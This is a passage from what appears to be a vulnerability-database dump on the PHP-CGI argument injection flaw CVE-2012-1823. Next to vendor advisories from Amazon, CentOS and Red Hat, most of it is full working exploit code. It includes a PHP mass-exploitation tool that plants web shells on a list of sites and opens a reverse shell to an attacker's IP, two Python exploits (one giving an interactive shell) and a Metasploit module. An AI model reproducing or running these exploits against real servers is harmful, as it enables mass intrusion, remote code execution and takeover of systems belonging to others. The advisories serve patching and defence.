php-ldap-5.3.13-1.20.amzn1.i686 \n php-recode-5.3.13-1.20.amzn1.i686 \n php-fpm-5.3.13-1.20.amzn1.i686 \n php-common-5.3.13-1.20.amzn1.i686 \n php-imap-5.3.13-1.20.amzn1.i686 \n php-embedded-5.3.13-1.20.amzn1.i686 \n php-cli-5.3.13-1.20.amzn1.i686 \n php-pgsql-5.3.13-1.20.amzn1.i686 \n php-intl-5.3.13-1.20.amzn1.i686 \n php-mysqlnd-5.3.13-1.20.amzn1.i686 \n php-pspell-5.3.13-1.20.amzn1.i686 \n php-gd-5.3.13-1.20.amzn1.i686 \n \n src: \n php-5.3.13-1.20.amzn1.src \n \n x86_64: \n php-snmp-5.3.13-1.20.amzn1.x86_64 \n php-mcrypt-5.3.13-1.20.amzn1.x86_64 \n php-5.3.13-1.20.amzn1.x86_64 \n php-devel-5.3.13-1.20.amzn1.x86_64 \n php-dba-5.3.13-1.20.amzn1.x86_64 \n php-mssql-5.3.13-1.20.amzn1.x86_64 \n php-process-5.3.13-1.20.amzn1.x86_64 \n php-imap-5.3.13-1.20.amzn1.x86_64 \n php-pspell-5.3.13-1.20.amzn1.x86_64 \n php-bcmath-5.3.13-1.20.amzn1.x86_64 \n php-common-5.3.13-1.20.amzn1.x86_64 \n php-xml-5.3.13-1.20.amzn1.x86_64 \n php-odbc-5.3.13-1.20.amzn1.x86_64 \n php-debuginfo-5.3.13-1.20.amzn1.x86_64 \n php-xmlrpc-5.3.13-1.20.amzn1.x86_64 \n php-fpm-5.3.13-1.20.amzn1.x86_64 \n php-cli-5.3.13-1.20.amzn1.x86_64 \n 
php-pgsql-5.3.13-1.20.amzn1.x86_64 \n php-mbstring-5.3.13-1.20.amzn1.x86_64 \n php-ldap-5.3.13-1.20.amzn1.x86_64 \n php-recode-5.3.13-1.20.amzn1.x86_64 \n php-intl-5.3.13-1.20.amzn1.x86_64 \n php-soap-5.3.13-1.20.amzn1.x86_64 \n php-mysqlnd-5.3.13-1.20.amzn1.x86_64 \n php-tidy-5.3.13-1.20.amzn1.x86_64 \n php-mysql-5.3.13-1.20.amzn1.x86_64 \n php-pdo-5.3.13-1.20.amzn1.x86_64 \n php-embedded-5.3.13-1.20.amzn1.x86_64 \n php-gd-5.3.13-1.20.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-05-09T14:54:00", "published": "2012-05-09T14:54:00", "id": "ALAS-2012-077", "href": "https://alas.aws.amazon.com/ALAS-2012-77.html", "title": "Critical: php", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:39", "description": "", "published": "2012-05-22T00:00:00", "type": "packetstorm", "title": "PHP CGI Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2012-05-22T00:00:00", "id": "PACKETSTORM:112971", "href": "https://packetstormsecurity.com/files/112971/PHP-CGI-Argument-Injection.html", "sourceData": "`<?php \n \n######################################### www.bugreport.ir \n######################################## \n# \n# Title: PHP CGI Argument Injection Remote Exploit \nV0.3 - PHP Version \n# Vendor: http://www.php.net \n# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2 \n# Exploitation: Remote \n# Original Advisory: \nhttp://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ \n# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm \n# CVE: CVE-2012-1823 \n# Coded By: Mostafa Azizi (admin[@]0-Day[dot]net) \n################################################################################################### \n \n/* This tool may be used for legal purposes only. Users take full \nresponsibility for any actions performed using this tool. \nThe author accepts no liability for damage caused by this tool. 
If \nthese terms are not acceptable to you, then do not use this tool.*/ \n \nerror_reporting(0); \nini_set(\"max_execution_time\",0); \nini_set(\"default_socket_timeout\", 10); \nob_implicit_flush (1); \n \necho'<html> \n<head> \n<title>PHP CGI Argument Injection Remote Exploit</title> \n</head> \n<p align=\"center\"><font size=\"4\" color=\"#5E767E\">PHP CGI Argument \nInjection</font></p> \n<p align=\"center\"><font size=\"3\" color=\"#4E8975\">Coded by: Mostafa \nAzizi (admin[@]0-Day[dot]net)</font></p> \n<body bgcolor=\"#00000\"> \n<table align=\"center\" border=\"5\"> \n<tr> \n<th><p align=\"center\"><font size=\"4\" color=\"#8BB381\">Mass File \nUploader</font></p> \n</th> \n<th></th> \n<th><p align=\"center\"><font size=\"4\" color=\"#8BB381\">Reverse \nShell</font></p> \n</th> \n</tr> \n<tr> \n<td><form name=\"form1\" action=\"'.$SERVER[PHP_SELF].'\" \nenctype=\"multipart/form-data\" method=\"post\"> \n</br> \n<p></font><font color=\"#FFF8C6\" >Please specify a file to \nscan: </font></br><input type=\"file\" name=\"listfile\" \nsize=\"40\"><font color=\"#FF0000\"> * </font> \n<p></font><font color=\"#FFF8C6\" >Please specify a file to \nupload: </font></br><input type=\"file\" name=\"datafile\" \nsize=\"40\"><font color=\"#FF0000\"> * </font> \n<p><font color=\"#FFF8C6\" > specify a port (default is 80): \n</font></br><input name=\"port\" size=\"20\"><span \nclass=\"Stile5\"></span></p> \n<p><font color=\"#FFF8C6\" > Proxy (ip:port): \n</font></br><input name=\"proxy\" size=\"20\"><span \nclass=\"Stile5\"></span></p> \n<p align=\"center\"> <span class=\"Stile5\"><font \ncolor=\"#FF0000\">* </font><font color=\"white\" >fields are \nrequired</font></font></span></p> \n</br> \n<p align=\"center\"><input type=\"submit\" value=\"Start Attack\" \nname=\"Submit\"></p> \n</form> </td> \n<td></td> \n<td><form name=\"form1\" action=\"'.$SERVER[PHP_SELF].'\" \nenctype=\"multipart/form-data\" method=\"post\"> \n</br> \n<p></font><font color=\"#FFF8C6\" > hostname 
(ex: \nwww.sitename.com):</font></br><input name=\"host\" size=\"20\"> <span \nclass=\"Stile5\"></span></p> \n<p></font><font color=\"#FFF8C6\" > Your IP (ex: \n173.194.35.169 ): </font></br><input name=\"lip\" size=\"20\"> \n<span class=\"Stile5\"></span></p> \n<p><font color=\"#FFF8C6\" > Your Port (ex: \n80):</font></br><input name=\"lport\" size=\"20\"> <span \nclass=\"Stile5\"></span></p> \n</br></br> \n<p align=\"center\"> <span class=\"Stile5\"><font \ncolor=\"#FF0000\">All </font><font color=\"white\" >fields are \nrequired</font></font></span></p> \n</br> \n<p align=\"center\"><input type=\"submit\" value=\"Start Attack\" \nname=\"Submit2\"></p> \n</form> </td> \n</tr> \n</table> \n</font> \n<table width=\"90%\"> \n<tbody> \n<tr> \n<td width=\"43%\" align=\"left\"> \n \n</td> \n</tr> \n</tbody> \n</table> \n</body></html>'; \n \n$host = $_POST['host']; \n$lip = $_POST['lip']; \n$lport = $_POST['lport']; \n$port = $_POST['port']; \n$proxy = $_POST['proxy']; \n$list = file($_FILES['listfile']['tmp_name']); \n$file = \nbase64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name']))); \n$shell = \"gzinflate(base64_decode(\\\"$file\\\"))\"; \n \nif (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') \n{ \n/*pentestmonkey's php-reverse-shell. \nLimitations: proc_open and stream_set_blocking require PHP version \n4.3+, or 5+ */ \n \n/* Connect Back */ \n \n$payload = \"<?php set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip = \n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null; \n\\$error_a = null; \\$shell = 'uname -a; w; id; /bin/sh -i'; \\$daemon = \n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid = \npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't fork\\\"); \nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) { \nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else { \nprintit(\\\"WARNING: Failed to daemonise. 
This is quite common and not \nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port, \n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\"); \nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 => \narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process = \nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if \n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\"); \nexit(1);}stream_set_blocking(\\$pipes[0], \n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2], \n0);stream_set_blocking(\\$sock, 0);printit(\\\"Successfully opened \nreverse shell to \\$ip:\\$port\\\"); while (1) { if (feof(\\$sock)) { \nprintit(\\\"ERROR: Shell connection terminated\\\"); break;} if \n(feof(\\$pipes[1])) {printit(\\\"ERROR: Shell process \nterminated\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1], \n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a, \n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug) \nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock, \n\\$chunk_size);if(\\$debug) printit(\\\"SOCK: \n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1], \n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input = \nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT: \n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2], \n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input = \nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR: \n\\$input\\\");fwrite(\\$sock, \n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print \\\"\\$string\\n\\\";}} \n?>\"; \n$packet = \"POST \n\".$p.\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \nHTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= 
\"User-Agent: PHP CGI Argument Injection Exploiter\\r\\n\"; \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\\r\\n\"; \n$packet .= $payload.\"\\r\\n\\r\\n\\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n \n}elseif (isset($_POST['Submit']) && $list != '' && $file != '') \n{ \nif ($port=='') {$port=80;} \n \nfor ($n =0; $n < count($list); $n++) \n{ \n \n$siteAddbackup = $list[$n]; \n$siteAdd=str_replace(\"http://\",\"\",$siteAddbackup); \n \npreg_match('/^(?:(?:http|https):\\/\\/)?[^\\/]+(\\/.+\\/)[^\\/\\.]+\\.[^\\/\\.]+$/i',$siteAddbackup, \n$match); \n$path = $match[1]; \n$pa = strstr(trim($siteAdd),$path); \n$host=trim(str_replace($pa,\"\",$siteAdd)); \nif ($path ==''){$path = \"/\"; } \nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;} \n \n/* Checking \nAvailability */ \n \n$connection = fsockopen($host,$port); \nif (!$connection) \n// site is down \n{ \necho '<font color=red> No response from \n'.htmlentities($host).' ...<br></font>'; \n \nfile_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', \n$siteAddbackup.\"\\r\\n\", FILE_APPEND); \n} \nelse \n// site is up \n{ \nfclose($connection); \nExploitable($host,$path,$p); \n} \n \n} \n} \n \nFunction Exploitable($host,$path,$p) \n{ \nglobal $html; \n$i=0; \n/* Checking Exploitability */ \n$packet = \"GET \".$p.\"?-s HTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter \\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n$str = array( \n'<code><span','<?'); \nforeach ($str as $value => $search){ \nif(stristr($html, $search) == TRUE) \n{$i=$i+1;}} \nswitch($i) \n{ \ncase 0: \necho '<font color=red>'.$host.' Faild!<br></font>'; \nbreak; \ncase 2: \necho '<font color=#FFF8C6>'.$host.' 
Exploitable<br></font>'; \nExploit($host,$path,$p); \n} \n} \n \nFunction Exploit($host,$path,$p) \n{ \nglobal $html, $shell; \n/* Exploiting */ \n \n$payload = \"<?php \\$myFile = \\\"legalpentest.php\\\"; \\$filehandle = \nfopen(\\$myFile, 'w') or die(\\\"can't open file\\\"); \\$Data=$shell; \nfwrite(\\$filehandle, \\$Data);fclose(\\$filehandle);\"; \n$packet = \"POST \n\".$p.\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input \nHTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: PHP CGI Argument Injection Exploiter\\r\\n\"; \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\\r\\n\"; \n$packet .= $payload.\"\\r\\n\\r\\n\\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n/* Check for successfully \nuploaded */ \n$packet = \"HEAD \".$p.\"/legalpentest.php HTTP/1.1\\r\\n\"; \n$packet .= \"Host: \".$host.\"\\r\\n\"; \n$packet .= \"User-Agent: :) \\r\\n\\r\\n\"; \nsendpacket($packet,1,0,0); \n \nif(stristr($html , '404 Not Found') == true) \n{ \necho '<font color=#FFF8C6><br>Exploit \nFaild...<br>-------------------------------------------------------<br></font>'; \n} \nelse { \necho \"<font color=#FFF8C6><br>Exploit \nSucceeded...<br>http://$host$path\".\"/legalpentest.php<br>-------------------------------------------------------<br></font>\"; \nfile_put_contents(realpath(dirname(__FILE__)).'/shell.txt', \n\"http://$host$path\".\"/legalpentest.php\\r\\n\", FILE_APPEND); \n} \n} \n \n \nfunction sendpacket($packet,$response = 0,$output = 0,$s=0) \n{ \n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)'; \nglobal $proxy, $host, $port, $html, $user, $pass; \nif ($proxy == '') \n{ \n$ock = fsockopen($host,$port); \nstream_set_timeout($ock, 5); \nif (!$ock) \n{ \necho 'No response from '.htmlentities($host).' 
...<br>'; \nstream_set_timeout($ock, 4); \n} \n} else \n{ \n$parts = explode(':',$proxy); \n// echo '<font color=white>Connecting to proxy: \n'.$parts[0].':'.$parts[1].' ...<br><br/></font>'; \n$ock = fsockopen($parts[0],$parts[1]); \nstream_set_timeout($ock, 5); \nif (!$ock) \n{ \necho 'No response from proxy...<br>'; \nfclose($ock); \n} \n} \n \nif ($ock) \n{ \nfputs($ock,$packet); \nif ($response == 1) \n{ \nif ($proxy == '') \n{ \n$html = ''; \nwhile (!feof($ock)) \n{ \n$html .= fgets($ock); \n} \n} else \n{ \n$html = ''; \nwhile ((!feof($ock)) or \n(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) \n{ \n$html .= fread($ock,1); \n} \n} \n} else $html = ''; \n \nfclose($ock); \n} \n} \n?> \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112971/phpcgi-exploit.txt"}, {"lastseen": "2016-12-05T22:25:20", "description": "", "published": "2012-05-06T00:00:00", "type": "packetstorm", "title": "PHP CGI Injection ", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2012-05-06T00:00:00", "id": "PACKETSTORM:112486", "href": "https://packetstormsecurity.com/files/112486/PHP-CGI-Injection.html", "sourceData": "`###################################################################################### \n# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit \n# Date: May 4, 2012 \n# Author: rayh4c[0x40]80sec[0x2e]com \n# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com \n###################################################################################### \n \nimport socket \nimport sys \n \ndef cgi_exploit(): \npwn_code = \"\"\"<?php phpinfo();?>\"\"\" \npost_Length = len(pwn_code) \nhttp_raw=\"\"\"POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1 \nHost: %s \nContent-Type: application/x-www-form-urlencoded \nContent-Length: %s \n \n%s \n\"\"\" %(HOST , post_Length ,pwn_code) \nprint http_raw 
\ntry: \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.connect((HOST, int(PORT))) \nsock.send(http_raw) \ndata = sock.recv(10000) \nprint repr(data) \nsock.close() \nexcept socket.error, msg: \nsys.stderr.write(\"[ERROR] %s\\n\" % msg[1]) \nsys.exit(1) \n \nif __name__ == '__main__': \ntry: \nHOST = sys.argv[1] \nPORT = sys.argv[2] \ncgi_exploit() \nexcept IndexError: \nprint '[+]Usage: cgi_test.py site.com 80' \nsys.exit(-1) \n \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112486/phpcgi-inject.txt"}, {"lastseen": "2016-12-05T22:23:14", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "PHP-CGI Argument Injection Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119075", "href": "https://packetstormsecurity.com/files/119075/PHP-CGI-Argument-Injection-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \nimport requests \nimport sys \n \nprint \"\"\" \nCVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution \nThis exploit abuses an arguement injection in the PHP-CGI wrapper \nto execute code as the PHP user/webserver user. 
\nFeel free to give me abuse about this <3 \n- infodox | insecurety.net | @info_dox \n\"\"\" \n \nif len(sys.argv) != 2: \nprint \"Usage: ./cve-2012-1823.py <target>\" \nsys.exit(0) \n \ntarget = sys.argv[1] \nurl = \"\"\"http://\"\"\" + target + \"\"\"/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input\"\"\" \nlol = \"\"\"<?php system('\"\"\" \nlol2 = \"\"\"');die(); ?>\"\"\" \nprint \"[+] Connecting and spawning a shell...\" \nwhile True: \ntry: \nbobcat = raw_input(\"%s:~$ \" %(target)) \nlulz = lol + bobcat + lol2 \nhax = requests.post(url, lulz) \nprint hax.text \nexcept KeyboardInterrupt: \nprint \"\\n[-] Quitting\" \nsys.exit(1) \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119075/cve-2012-1823.py.txt"}], "seebug": [{"lastseen": "2017-11-19T15:53:29", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "PHP CGI Argument Injection", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72859", "id": "SSV:72859", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PHP CGI Argument Injection',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tWhen run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\r\n\t\t\t\tan argument injection vulnerability. 
This module takes advantage of\r\n\t\t\t\tthe -d flag to set php.ini directives to achieve code execution.\r\n\t\t\t\tFrom the advisory: "if there is NO unescaped '=' in the query string,\r\n\t\t\t\tthe string is split on '+' (encoded space) characters, urldecoded,\r\n\t\t\t\tpassed to a function that escapes shell metacharacters (the "encoded in\r\n\t\t\t\ta system-defined manner" from the RFC) and then passes them to the CGI\r\n\t\t\t\tbinary."\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'egypt', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' => [\r\n\t\t\t\t\t[ "CVE"\t, "2012-1823" ],\r\n\t\t\t\t\t[ "URL"\t, "http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/" ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t# Arbitrary big number. The payload gets sent as an HTTP\r\n\t\t\t\t\t# response body, so really it's unlimited\r\n\t\t\t\t\t'Space' => 262144, # 256k\r\n\t\t\t\t},\r\n\t\t\t'DisclosureDate' => 'May 03 2012',\r\n\t\t\t'Platform' => 'php',\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# php-cgi -h\r\n\t# ...\r\n\t# -s Display colour syntax highlighted source.\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\r\n\t\turi.gsub!(/\\?.*/, "")\r\n\r\n\t\tprint_status("Checking uri #{uri}")\r\n\r\n\t\tresponse = send_request_raw({ 'uri' => uri })\r\n\r\n\t\tif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\<\\;\\?/mi\r\n\t\t\tprint_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tresponse = send_request_raw({ 'uri' => uri + '?-s'})\r\n\t\tif 
response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\<\\;\\?/mi\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_error("Server responded indicating it was not vulnerable")\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbegin\r\n\t\t\targs = [\r\n\t\t\t\t"-d+allow_url_include%3d#{rand_php_ini_true}",\r\n\t\t\t\t"-d+safe_mode%3d#{rand_php_ini_false}",\r\n\t\t\t\t"-d+suhosin.simulation%3d#{rand_php_ini_true}",\r\n\t\t\t\t"-d+disable_functions%3d%22%22",\r\n\t\t\t\t"-d+open_basedir%3dnone",\r\n\t\t\t\t"-d+auto_prepend_file%3dphp://input",\r\n\t\t\t\t"-n"\r\n\t\t\t]\r\n\r\n\t\t\tqs = args.join("+")\r\n\t\t\turi = "#{target_uri}?#{qs}"\r\n\r\n\t\t\t# Has to be all on one line, so gsub out the comments and the newlines\r\n\t\t\tpayload_oneline = "<?php " + payload.encoded.gsub(/\\s*#.*$/, "").gsub("\\n", "")\r\n\t\t\tresponse = send_request_cgi( {\r\n\t\t\t\t'method' => "POST",\r\n\t\t\t\t'global' => true,\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'data' => payload_oneline,\r\n\t\t\t}, 0.5)\r\n\t\t\thandler\r\n\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\r\n\t\t\tprint_error("The target service unreachable")\r\n\t\trescue ::OpenSSL::SSL::SSLError\r\n\t\t\tprint_error("The target failed to negotiate SSL, is this really an SSL service?")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef rand_php_ini_false\r\n\t\tRex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])\r\n\tend\r\n\r\n\tdef rand_php_ini_true\r\n\t\tRex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72859"}], "centos": [{"lastseen": "2019-12-20T18:29:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0547\n\n\nPHP is an HTML-embedded 
scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a \nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This \ncould lead to the disclosure of the script's source code or arbitrary code \nexecution with the privileges of the PHP interpreter. (CVE-2012-1823) \n\nRed Hat is aware that a public exploit for this issue is available that \nallows remote code execution in affected PHP CGI configurations. This flaw \ndoes not affect the default configuration using the PHP module for Apache \nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-May/030655.html\n\n**Affected packages:**\nphp53\nphp53-bcmath\nphp53-cli\nphp53-common\nphp53-dba\nphp53-devel\nphp53-gd\nphp53-imap\nphp53-intl\nphp53-ldap\nphp53-mbstring\nphp53-mysql\nphp53-odbc\nphp53-pdo\nphp53-pgsql\nphp53-process\nphp53-pspell\nphp53-snmp\nphp53-soap\nphp53-xml\nphp53-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0547.html", "edition": 3, "modified": "2012-05-07T23:01:16", "published": "2012-05-07T23:01:16", "href": "http://lists.centos.org/pipermail/centos-announce/2012-May/030655.html", "id": "CESA-2012:0547", "title": "php53 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:47:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP 
Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration in Red Hat Enterprise Linux 5 and\n6 using the PHP module for Apache httpd to handle PHP scripts.\n\nAll php users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:08:16", "published": "2012-05-10T04:00:00", "id": "RHSA-2012:0568", "href": "https://access.redhat.com/errata/RHSA-2012:0568", "type": "redhat", "title": "(RHSA-2012:0568) Critical: php security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:56", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command line\narguments when running in CGI mode. A remote attacker could send a\nspecially-crafted request to a PHP script that would result in the query\nstring being parsed by php-cgi as command line options and arguments. This\ncould lead to the disclosure of the script's source code or arbitrary code\nexecution with the privileges of the PHP interpreter. 
(CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available that\nallows remote code execution in affected PHP CGI configurations. This flaw\ndoes not affect the default configuration using the PHP module for Apache\nhttpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which contain a\nbackported patch to resolve this issue. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:09:34", "published": "2012-05-10T04:00:00", "id": "RHSA-2012:0569", "href": "https://access.redhat.com/errata/RHSA-2012:0569", "type": "redhat", "title": "(RHSA-2012:0569) Critical: php53 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:56", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "[](<https://4.bp.blogspot.com/-XAsXMXrVRn4/Uyqy3GL-9EI/AAAAAAAAatg/T1_l1UZYSNI/s1600/Linux-malware-Internet-of-Things-security-app.png>)\n\nCould a perfectly innocent-looking device like a router, TV set-top box or security camera mine Bitcoins? YES! Hackers are not going to spare smart Internet-enabled devices.\n\n \n\n\nA Linux worm named **_Linux.Darlloz_**, earlier used to target _Internet of Things (IoT)_ devices, i.e. 
